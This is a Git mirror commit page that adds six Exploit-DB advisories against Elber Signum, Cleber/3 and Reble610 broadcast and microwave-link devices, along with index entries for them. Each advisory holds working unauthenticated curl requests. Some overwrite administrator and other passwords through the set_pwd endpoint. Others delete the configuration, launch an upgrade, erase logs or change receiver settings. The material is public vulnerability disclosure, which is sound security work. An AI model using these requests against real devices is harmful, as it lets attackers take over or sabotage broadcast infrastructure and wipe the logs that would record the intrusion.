bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2024-05-05

Browse source 
7 changes to exploits/shellcodes/ghdb

Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 - Authentication Bypass
Elber Reble610 M/ODU XPIC IP-ASI-SDH Microwave Link - Authentication Bypass
Elber Reble610 M/ODU XPIC IP-ASI-SDH Microwave Link - Device Config Disclosure
Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 - Authentication Bypass
Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 - Device Config Disclosure

Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 - Device Config Disclosure
This commit is contained in:
Exploit-DB 2024-05-05 00:16:37 +00:00
parent 67e4434322
commit b8a68091fe
7 changed files with 445 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

76
exploits/hardware/webapps/52002.txt Normal file
View file

@ -0,0 +1,76 @@
Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 Authentication Bypass
Vendor: Elber S.r.l.
Product web page: https://www.elber.it
Affected version: 1.999 Revision 1243
1.317 Revision 602
1.220 Revision 1250
1.220 Revision 1248_1249
1.220 Revision 597
1.217 Revision 1242
1.214 Revision 1023
1.193 Revision 924
1.175 Revision 873
1.166 Revision 550
Summary: The SIGNUM controller from Elber satellite equipment demodulates
one or two DVB-S/ S2 signals up to 32APSK (single/multi-stream), achieving
256 KS/s as minimum symbol rate. The TS demodulated signals can be aligned
and configured in 1+1 seamless switching for redundancy. Redundancy can also
be achieved with external ASI and TSoIP inputs. Signum supports MPEG-1 LI/II
audio codec, providing analog and digital outputs; moreover, its possible
to set a data PID to be decoded and passed to the internal RDS encoder,
generating the dual MPX FM output.
Desc: The device suffers from an authentication bypass vulnerability through
a direct and unauthorized access to the password management functionality. The
issue allows attackers to bypass authentication by manipulating the set_pwd
endpoint that enables them to overwrite the password of any user within the
system. This grants unauthorized and administrative access to protected areas
of the application compromising the device's system security.
--------------------------------------------------------------------------
/modules/pwd.html
------------------
50: function apply_pwd(level, pwd)
51: {
52: $.get("json_data/set_pwd", {lev:level, pass:pwd},
53: function(data){
54: //$.alert({title:'Operation',text:data});
55: show_message(data);
56: }).fail(function(error){
57: show_message('Error ' + error.status, 'error');
58: });
59: }
--------------------------------------------------------------------------
Tested on: NBFM Controller
embOS/IP
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2024-5814
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5814.php
18.08.2023
--
$ curl -s http://[TARGET]/json_data/set_pwd?lev=2&pass=admin1234
Ref (lev param):
Level 7 = SNMP Write Community (snmp_write_pwd)
Level 6 = SNMP Read Community (snmp_read_pwd)
Level 5 = Custom Password? hidden. (custom_pwd)
Level 4 = Display Password (display_pwd)?
Level 2 = Administrator Password (admin_pwd)
Level 1 = Super User Password (puser_pwd)
Level 0 = User Password (user_pwd)

77
exploits/hardware/webapps/52003.txt Normal file
View file

@ -0,0 +1,77 @@
Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 Device Config
Vendor: Elber S.r.l.
Product web page: https://www.elber.it
Affected version: 1.999 Revision 1243
1.317 Revision 602
1.220 Revision 1250
1.220 Revision 1248_1249
1.220 Revision 597
1.217 Revision 1242
1.214 Revision 1023
1.193 Revision 924
1.175 Revision 873
1.166 Revision 550
Summary: The SIGNUM controller from Elber satellite equipment demodulates
one or two DVB-S/ S2 signals up to 32APSK (single/multi-stream), achieving
256 KS/s as minimum symbol rate. The TS demodulated signals can be aligned
and configured in 1+1 seamless switching for redundancy. Redundancy can also
be achieved with external ASI and TSoIP inputs. Signum supports MPEG-1 LI/II
audio codec, providing analog and digital outputs; moreover, its possible
to set a data PID to be decoded and passed to the internal RDS encoder,
generating the dual MPX FM output.
Desc: The device suffers from an unauthenticated device configuration and
client-side hidden functionality disclosure.
Tested on: NBFM Controller
embOS/IP
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2024-5815
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5815.php
18.08.2023
--
# Config fan
$ curl 'http://TARGET/json_data/fan?fan_speed=&fan_target=&warn_temp=&alarm_temp='
Configuration applied
# Delete config
$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=2'
File delete successfully
# Launch upgrade
$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=1'
Upgrade launched Successfully
# Log erase
$ curl 'http://TARGET/json_data/erase_log.js?until=-2'
Logs erased
# Until:
# =0 ALL
# =-2 Yesterday
# =-8 Last week
# =-15 Last two weeks
# =-22 Last three weeks
# =-31 Last month
# Set RX config
$ curl 'http://TARGET/json_data/NBFMV2RX.setConfig?freq=2480000&freq_offset=0&mute=1&sq_thresh=-90.0&dec_mode=0&lr_swap=0&preemph=0&preemph_const=0&deemph=0&deemph_const=1&ch_lr_enable=0&ch_r_gain=0.0&ch_l_gain=0.0&ch_adj_ctrl=0&ch_lr_att=1&mpxdig_att=0&pilot_trim=0.0&mpxdig_gain=0.0&rds_trim=0.0&delay_enable=0&local_rds=0&output_delay=0&pi_code=0___&mpx1_enable=1&mpx2_enable=1&sca1_enable=1&sca2_enable=0&mpx1_att=0&mpx2_att=0&sca1_att=0&sca2_att=0&mpx1_gain=0.0&mpx2_gain=0.0&sca1_gain=0.0&sca2_gain=0.0&limiter_enable=false&lim_1_gain=0.0+dB&lim_1_th=0.0+kHz&lim_1_alpha=0.0+%25&setupTime=0.0+ms&holdTime=0.0+ms&releaseFactor=0.0+dB%2Fsec&lim_2_en=false&lim_2_gain=0.0+dB&lim_2_th=0.0+kHz&rds_gen=false&rt_PI=&rt_PS=&rt_plus_en=false&rt_line_A=&rt_line_B=&rt_AF=&rf_trap=0&output_trap=0'
RX Config Applied Successfully
# Show factory window and FPGA upload (Console)
> cleber_show_factory_wnd()
# Etc.

73
exploits/hardware/webapps/52004.txt Normal file
View file

@ -0,0 +1,73 @@
Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 Authentication Bypass
Vendor: Elber S.r.l.
Product web page: https://www.elber.it
Affected version: 1.0.0 Revision 7304
1.0.0 Revision 7284
1.0.0 Revision 6505
1.0.0 Revision 6332
1.0.0 Revision 6258
XS2DAB v1.50 rev 6267
Summary: Cleber offers a powerful, flexible and modular hardware and
software platform for broadcasting and contribution networks where
customers can install up to six boards with no limitations in terms
of position or number. Based on a Linux embedded OS, it detects the
presence of the boards and shows the related control interface to the
user, either through web GUI and Touchscreen TFT display. Power supply
can be single (AC and/or DC) or dual (hot swappable for redundancy);
customer may chose between two ranges for DC sources, that is 22-65
or 10-36 Vdc for site or DSNG applications.
Desc: The device suffers from an authentication bypass vulnerability through
a direct and unauthorized access to the password management functionality. The
issue allows attackers to bypass authentication by manipulating the set_pwd
endpoint that enables them to overwrite the password of any user within the
system. This grants unauthorized and administrative access to protected areas
of the application compromising the device's system security.
--------------------------------------------------------------------------
/modules/pwd.html
------------------
50: function apply_pwd(level, pwd)
51: {
52: $.get("json_data/set_pwd", {lev:level, pass:pwd},
53: function(data){
54: //$.alert({title:'Operation',text:data});
55: show_message(data);
56: }).fail(function(error){
57: show_message('Error ' + error.status, 'error');
58: });
59: }
--------------------------------------------------------------------------
Tested on: NBFM Controller
embOS/IP
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2024-5816
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5816.php
18.08.2023
--
$ curl -s http://[TARGET]/json_data/set_pwd?lev=2&pass=admin1234
Ref (lev param):
Level 7 = SNMP Write Community (snmp_write_pwd)
Level 6 = SNMP Read Community (snmp_read_pwd)
Level 5 = Custom Password? hidden. (custom_pwd)
Level 4 = Display Password (display_pwd)?
Level 2 = Administrator Password (admin_pwd)
Level 1 = Super User Password (puser_pwd)
Level 0 = User Password (user_pwd)

69
exploits/hardware/webapps/52006.txt Normal file
View file

@ -0,0 +1,69 @@
Elber Reble610 M/ODU XPIC IP-ASI-SDH Microwave Link Authentication Bypass
Vendor: Elber S.r.l.
Product web page: https://www.elber.it
Affected version: 0.01 Revision 0
Summary: The REBLE610 features an accurate hardware design, absence of
internal cabling and full modularity. The unit is composed by a basic
chassis with 4 extractable boards which makes maintenance and critical
operations, like frequency modification, easy and efficient. The modular
approach has brought to the development of the digital processing module
(containing modulator, demodulator and data interface) and the RF module
(containing Transmitter, Receiver and channel filters). From an RF point
of view, the new transmission circuitry is able to guarantee around 1 Watt
with every modulation scheme, introducing, in addition, wideband precorrection
(up to 1GHz depending on frequency band).
Desc: The device suffers from an authentication bypass vulnerability through
a direct and unauthorized access to the password management functionality. The
issue allows attackers to bypass authentication by manipulating the set_pwd
endpoint that enables them to overwrite the password of any user within the
system. This grants unauthorized and administrative access to protected areas
of the application compromising the device's system security.
--------------------------------------------------------------------------
/modules/pwd.html
------------------
50: function apply_pwd(level, pwd)
51: {
52: $.get("json_data/set_pwd", {lev:level, pass:pwd},
53: function(data){
54: //$.alert({title:'Operation',text:data});
55: show_message(data);
56: }).fail(function(error){
57: show_message('Error ' + error.status, 'error');
58: });
59: }
--------------------------------------------------------------------------
Tested on: NBFM Controller
embOS/IP
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2024-5818
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5818.php
18.08.2023
--
$ curl -s http://[TARGET]/json_data/set_pwd?lev=2&pass=admin1234
Ref (lev param):
Level 7 = SNMP Write Community (snmp_write_pwd)
Level 6 = SNMP Read Community (snmp_read_pwd)
Level 5 = Custom Password? hidden. (custom_pwd)
Level 4 = Display Password (display_pwd)?
Level 2 = Administrator Password (admin_pwd)
Level 1 = Super User Password (puser_pwd)
Level 0 = User Password (user_pwd)

70
exploits/hardware/webapps/52007.txt Normal file
View file

@ -0,0 +1,70 @@
Elber Reble610 M/ODU XPIC IP-ASI-SDH Microwave Link Device Config
Vendor: Elber S.r.l.
Product web page: https://www.elber.it
Affected version: 0.01 Revision 0
Summary: The REBLE610 features an accurate hardware design, absence of
internal cabling and full modularity. The unit is composed by a basic
chassis with 4 extractable boards which makes maintenance and critical
operations, like frequency modification, easy and efficient. The modular
approach has brought to the development of the digital processing module
(containing modulator, demodulator and data interface) and the RF module
(containing Transmitter, Receiver and channel filters). From an RF point
of view, the new transmission circuitry is able to guarantee around 1 Watt
with every modulation scheme, introducing, in addition, wideband precorrection
(up to 1GHz depending on frequency band).
Desc: The device suffers from an unauthenticated device configuration and
client-side hidden functionality disclosure.
Tested on: NBFM Controller
embOS/IP
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2024-5819
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5819.php
18.08.2023
--
# Config fan
$ curl 'http://TARGET/json_data/fan?fan_speed=&fan_target=&warn_temp=&alarm_temp='
Configuration applied
# Delete config
$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=2'
File delete successfully
# Launch upgrade
$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=1'
Upgrade launched Successfully
# Log erase
$ curl 'http://TARGET/json_data/erase_log.js?until=-2'
Logs erased
# Until:
# =0 ALL
# =-2 Yesterday
# =-8 Last week
# =-15 Last two weeks
# =-22 Last three weeks
# =-31 Last month
# Set RX config
$ curl 'http://TARGET/json_data/NBFMV2RX.setConfig?freq=2480000&freq_offset=0&mute=1&sq_thresh=-90.0&dec_mode=0&lr_swap=0&preemph=0&preemph_const=0&deemph=0&deemph_const=1&ch_lr_enable=0&ch_r_gain=0.0&ch_l_gain=0.0&ch_adj_ctrl=0&ch_lr_att=1&mpxdig_att=0&pilot_trim=0.0&mpxdig_gain=0.0&rds_trim=0.0&delay_enable=0&local_rds=0&output_delay=0&pi_code=0___&mpx1_enable=1&mpx2_enable=1&sca1_enable=1&sca2_enable=0&mpx1_att=0&mpx2_att=0&sca1_att=0&sca2_att=0&mpx1_gain=0.0&mpx2_gain=0.0&sca1_gain=0.0&sca2_gain=0.0&limiter_enable=false&lim_1_gain=0.0+dB&lim_1_th=0.0+kHz&lim_1_alpha=0.0+%25&setupTime=0.0+ms&holdTime=0.0+ms&releaseFactor=0.0+dB%2Fsec&lim_2_en=false&lim_2_gain=0.0+dB&lim_2_th=0.0+kHz&rds_gen=false&rt_PI=&rt_PS=&rt_plus_en=false&rt_line_A=&rt_line_B=&rt_AF=&rf_trap=0&output_trap=0'
RX Config Applied Successfully
# Show factory window and FPGA upload (Console)
> cleber_show_factory_wnd()
# Etc.

74
exploits/php/webapps/52005.txt Normal file
View file

@ -0,0 +1,74 @@
Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 Device Config
Vendor: Elber S.r.l.
Product web page: https://www.elber.it
Affected version: 1.0.0 Revision 7304
1.0.0 Revision 7284
1.0.0 Revision 6505
1.0.0 Revision 6332
1.0.0 Revision 6258
XS2DAB v1.50 rev 6267
Summary: Cleber offers a powerful, flexible and modular hardware and
software platform for broadcasting and contribution networks where
customers can install up to six boards with no limitations in terms
of position or number. Based on a Linux embedded OS, it detects the
presence of the boards and shows the related control interface to the
user, either through web GUI and Touchscreen TFT display. Power supply
can be single (AC and/or DC) or dual (hot swappable for redundancy);
customer may chose between two ranges for DC sources, that is 22-65
or 10-36 Vdc for site or DSNG applications.
Desc: The device suffers from an unauthenticated device configuration and
client-side hidden functionality disclosure.
Tested on: NBFM Controller
embOS/IP
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2024-5817
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5817.php
18.08.2023
--
# Config fan
$ curl 'http://TARGET/json_data/fan?fan_speed=&fan_target=&warn_temp=&alarm_temp='
Configuration applied
# Delete config
$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=2'
File delete successfully
# Launch upgrade
$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=1'
Upgrade launched Successfully
# Log erase
$ curl 'http://TARGET/json_data/erase_log.js?until=-2'
Logs erased
# Until:
# =0 ALL
# =-2 Yesterday
# =-8 Last week
# =-15 Last two weeks
# =-22 Last three weeks
# =-31 Last month
# Set RX config
$ curl 'http://TARGET/json_data/NBFMV2RX.setConfig?freq=2480000&freq_offset=0&mute=1&sq_thresh=-90.0&dec_mode=0&lr_swap=0&preemph=0&preemph_const=0&deemph=0&deemph_const=1&ch_lr_enable=0&ch_r_gain=0.0&ch_l_gain=0.0&ch_adj_ctrl=0&ch_lr_att=1&mpxdig_att=0&pilot_trim=0.0&mpxdig_gain=0.0&rds_trim=0.0&delay_enable=0&local_rds=0&output_delay=0&pi_code=0___&mpx1_enable=1&mpx2_enable=1&sca1_enable=1&sca2_enable=0&mpx1_att=0&mpx2_att=0&sca1_att=0&sca2_att=0&mpx1_gain=0.0&mpx2_gain=0.0&sca1_gain=0.0&sca2_gain=0.0&limiter_enable=false&lim_1_gain=0.0+dB&lim_1_th=0.0+kHz&lim_1_alpha=0.0+%25&setupTime=0.0+ms&holdTime=0.0+ms&releaseFactor=0.0+dB%2Fsec&lim_2_en=false&lim_2_gain=0.0+dB&lim_2_th=0.0+kHz&rds_gen=false&rt_PI=&rt_PS=&rt_plus_en=false&rt_line_A=&rt_line_B=&rt_AF=&rf_trap=0&output_trap=0'
RX Config Applied Successfully
# Show factory window and FPGA upload (Console)
> cleber_show_factory_wnd()
# Etc.

6
files_exploits.csv
View file

@ -4369,6 +4369,11 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48763,exploits/hardware/webapps/48763.txt,"Eibiz i-Media Server Digital Signage 3.8.0 - Authentication Bypass",2020-08-24,LiquidWorm,webapps,hardware,,2020-08-24,2020-08-24,0,,,,,, 48763,exploits/hardware/webapps/48763.txt,"Eibiz i-Media Server Digital Signage 3.8.0 - Authentication Bypass",2020-08-24,LiquidWorm,webapps,hardware,,2020-08-24,2020-08-24,0,,,,,,
48764,exploits/hardware/webapps/48764.txt,"Eibiz i-Media Server Digital Signage 3.8.0 - Configuration Disclosure",2020-08-24,LiquidWorm,webapps,hardware,,2020-08-24,2020-08-24,0,,,,,, 48764,exploits/hardware/webapps/48764.txt,"Eibiz i-Media Server Digital Signage 3.8.0 - Configuration Disclosure",2020-08-24,LiquidWorm,webapps,hardware,,2020-08-24,2020-08-24,0,,,,,,
48774,exploits/hardware/webapps/48774.py,"Eibiz i-Media Server Digital Signage 3.8.0 - Privilege Escalation",2020-08-28,LiquidWorm,webapps,hardware,,2020-08-28,2020-08-28,0,,,,,, 48774,exploits/hardware/webapps/48774.py,"Eibiz i-Media Server Digital Signage 3.8.0 - Privilege Escalation",2020-08-28,LiquidWorm,webapps,hardware,,2020-08-28,2020-08-28,0,,,,,,
52004,exploits/hardware/webapps/52004.txt,"Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 - Authentication Bypass",2024-05-04,LiquidWorm,webapps,hardware,,2024-05-04,2024-05-04,0,,,,,,
52006,exploits/hardware/webapps/52006.txt,"Elber Reble610 M/ODU XPIC IP-ASI-SDH Microwave Link - Authentication Bypass",2024-05-04,LiquidWorm,webapps,hardware,,2024-05-04,2024-05-04,0,,,,,,
52007,exploits/hardware/webapps/52007.txt,"Elber Reble610 M/ODU XPIC IP-ASI-SDH Microwave Link - Device Config Disclosure",2024-05-04,LiquidWorm,webapps,hardware,,2024-05-04,2024-05-04,0,,,,,,
52002,exploits/hardware/webapps/52002.txt,"Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 - Authentication Bypass",2024-05-04,LiquidWorm,webapps,hardware,,2024-05-04,2024-05-04,0,,,,,,
52003,exploits/hardware/webapps/52003.txt,"Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 - Device Config Disclosure",2024-05-04,LiquidWorm,webapps,hardware,,2024-05-04,2024-05-04,0,,,,,,
51771,exploits/hardware/webapps/51771.txt,"Electrolink FM/DAB/TV Transmitter (controlloLogin.js) - Credentials Disclosure",2024-02-02,LiquidWorm,webapps,hardware,,2024-02-02,2024-02-02,0,,,,,, 51771,exploits/hardware/webapps/51771.txt,"Electrolink FM/DAB/TV Transmitter (controlloLogin.js) - Credentials Disclosure",2024-02-02,LiquidWorm,webapps,hardware,,2024-02-02,2024-02-02,0,,,,,,
51772,exploits/hardware/webapps/51772.txt,"Electrolink FM/DAB/TV Transmitter (Login Cookie) - Authentication Bypass",2024-02-02,LiquidWorm,webapps,hardware,,2024-02-02,2024-02-02,0,,,,,, 51772,exploits/hardware/webapps/51772.txt,"Electrolink FM/DAB/TV Transmitter (Login Cookie) - Authentication Bypass",2024-02-02,LiquidWorm,webapps,hardware,,2024-02-02,2024-02-02,0,,,,,,
51770,exploits/hardware/webapps/51770.txt,"Electrolink FM/DAB/TV Transmitter (login.htm/mail.htm) - Credentials Disclosure",2024-02-02,LiquidWorm,webapps,hardware,,2024-02-02,2024-02-02,0,,,,,, 51770,exploits/hardware/webapps/51770.txt,"Electrolink FM/DAB/TV Transmitter (login.htm/mail.htm) - Credentials Disclosure",2024-02-02,LiquidWorm,webapps,hardware,,2024-02-02,2024-02-02,0,,,,,,
@ -17889,6 +17894,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
37637,exploits/php/webapps/37637.pl,"Elastix 2.2.0 - 'graph.php' Local File Inclusion",2012-08-17,cheki,webapps,php,,2012-08-17,2015-07-18,1,,,,,,https://www.securityfocus.com/bid/55078/info 37637,exploits/php/webapps/37637.pl,"Elastix 2.2.0 - 'graph.php' Local File Inclusion",2012-08-17,cheki,webapps,php,,2012-08-17,2015-07-18,1,,,,,,https://www.securityfocus.com/bid/55078/info
36305,exploits/php/webapps/36305.txt,"Elastix 2.x - Blind SQL Injection",2015-03-07,"Ahmed Aboul-Ela",webapps,php,,2015-03-12,2015-03-12,0,CVE-2015-1875;OSVDB-119526,,,,, 36305,exploits/php/webapps/36305.txt,"Elastix 2.x - Blind SQL Injection",2015-03-07,"Ahmed Aboul-Ela",webapps,php,,2015-03-12,2015-03-12,0,CVE-2015-1875;OSVDB-119526,,,,,
38091,exploits/php/webapps/38091.php,"Elastix < 2.5 - PHP Code Injection",2015-09-06,i-Hmx,webapps,php,,2015-09-06,2015-09-06,0,OSVDB-127251,,,,, 38091,exploits/php/webapps/38091.php,"Elastix < 2.5 - PHP Code Injection",2015-09-06,i-Hmx,webapps,php,,2015-09-06,2015-09-06,0,OSVDB-127251,,,,,
52005,exploits/php/webapps/52005.txt,"Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 - Device Config Disclosure",2024-05-04,LiquidWorm,webapps,php,,2024-05-04,2024-05-04,0,,,,,,
10418,exploits/php/webapps/10418.txt,"Ele Medios CMS - SQL Injection",2009-12-13,"Dr.0rYX & Cr3W-DZ",webapps,php,,2009-12-12,,1,,,,,, 10418,exploits/php/webapps/10418.txt,"Ele Medios CMS - SQL Injection",2009-12-13,"Dr.0rYX & Cr3W-DZ",webapps,php,,2009-12-12,,1,,,,,,
35567,exploits/php/webapps/35567.txt,"Eleanor CMS - Cross-Site Scripting / Multiple SQL Injections",2011-04-05,"High-Tech Bridge SA",webapps,php,,2011-04-05,2014-12-18,1,,,,,,https://www.securityfocus.com/bid/47164/info 35567,exploits/php/webapps/35567.txt,"Eleanor CMS - Cross-Site Scripting / Multiple SQL Injections",2011-04-05,"High-Tech Bridge SA",webapps,php,,2011-04-05,2014-12-18,1,,,,,,https://www.securityfocus.com/bid/47164/info
18858,exploits/php/webapps/18858.txt,"eLearning server 4g - Multiple Vulnerabilities",2012-05-10,"Andrey Komarov",webapps,php,,2012-05-10,2012-05-10,0,OSVDB-81831;OSVDB-81830;CVE-2012-2924;CVE-2012-2923,,,,, 18858,exploits/php/webapps/18858.txt,"eLearning server 4g - Multiple Vulnerabilities",2012-05-10,"Andrey Komarov",webapps,php,,2012-05-10,2012-05-10,0,OSVDB-81831;OSVDB-81830;CVE-2012-2924;CVE-2012-2923,,,,,

Can't render this file because it is too large.